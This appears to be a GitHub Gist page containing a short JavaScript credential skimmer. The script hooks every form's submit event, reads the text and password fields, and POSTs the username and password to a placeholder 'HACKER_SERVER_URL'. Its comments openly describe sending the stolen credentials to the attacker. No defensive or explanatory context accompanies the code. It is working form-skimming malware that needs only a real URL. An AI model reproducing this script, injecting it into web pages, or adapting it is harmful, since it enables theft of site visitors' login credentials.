Create a gist now

Instantly share code, notes, and snippets.

What would you like to do?
(function() {
// get all the form elements on the page
var forms = document.getElementsByTagName('form');
// iterate all the form elements and add a new submit event listener
for (var i=0; i < forms.length; i++) {
var form = forms[i];
if (form.addEventListener) {
form.addEventListener('submit', onFormSubmit, true);
} else if (form.attachEvent) {
form.attachEvent('onsubmit', onFormSubmit);
}
}
// collecting the form values and sending them to the HACKER SERVER
function collectInputValues(form) {
// getting all the input elements
var inputs = form.getElementsByTagName('input');
var username = '';
var password = '';
for (var i = 0; i < inputs.length; i++) {
var input = inputs[i];
var type = input.getAttribute('type');
// store the username
if (type == 'text') {
username = input.value;
}
// store the password
if (type == 'password') {
password = input.value;
}
}
if (username != '' && password != '') {
var http = new XMLHttpRequest();
var url = "HACKER_SERVER_URL";
// setting the form values inside the parameters string before sending the request
var params = "username=" + username + "&password=" + password;
// sending the request to the hacker along with the form values
http.open("POST", url, true);
http.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
http.setRequestHeader("Content-length", params.length);
http.setRequestHeader("Connection", "close");
http.onreadystatechange = function() {
if(http.readyState == 4 && http.status == 200) {
// hacker successfully collected our credentials
}
}
http.send(params);
}
}
// this method is invoked on any form submit
function onFormSubmit(event) {
if (!event) var event = window.event;
var target;
// getting the relevant form
if (event.target) target = event.target;
else if (event.srcElement) target = event.srcElement;
if (!target) return;
// call the method to collect the form values
collectInputValues(target);
}
})();
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment